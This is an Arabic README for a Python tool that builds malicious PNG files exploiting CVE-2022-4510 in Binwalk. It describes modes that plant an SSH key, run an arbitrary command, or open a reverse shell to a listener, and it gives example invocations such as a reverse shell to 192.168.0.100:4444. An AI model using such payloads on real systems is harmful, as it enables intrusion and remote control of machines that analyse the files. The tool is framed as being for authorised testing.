
نص Python لإنشاء استغلالات تستهدف CVE-2022-4510 RCE Binwalk. يدعم خيارات SSH، تنفيذ الأوامر، و reverse shell. يتم حفظ الاستغلالات بصيغة PNG. مثالي للاختبار والعروض التوضيحية.
يتيح لك هذا البرنامج النصي إنشاء استغلالات لاستهداف ثغرات CVE-2022-4510 في Binwalk. يمكن استخدام الاستغلالات للاختبار والعروض التوضيحية. تشمل الخيارات المدعومة SSH وتنفيذ الأوامر والصدفة العكسية.
ssh: إنشاء استغلال لـ SSH.
file: مسار ملف .png المدخل.pub: مسار ملف المفتاح العام.command: إنشاء استغلال لتنفيذ أمر.
--command: الأمر المراد تنفيذه.file: مسار ملف .png المدخل.reverse: إنشاء استغلال لصدفة عكسية.
file: مسار ملف .png المدخل.ip: عنوان IP للمستمع.port: رقم منفذ المستمع.أمثلة الاستخدام:
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
سيتم حفظ الاستغلال الذي تم إنشاؤه باسم binwalk_exploit.png في الدليل الحالي.
استخدم هذا البرنامج النصي بمسؤولية وفقط على الأنظمة التي لديك إذن باختبار أو عرض الثغرات فيها. المؤلف غير مسؤول عن أي استخدام غير قانوني أو غير مصرح به لهذا البرنامج النصي.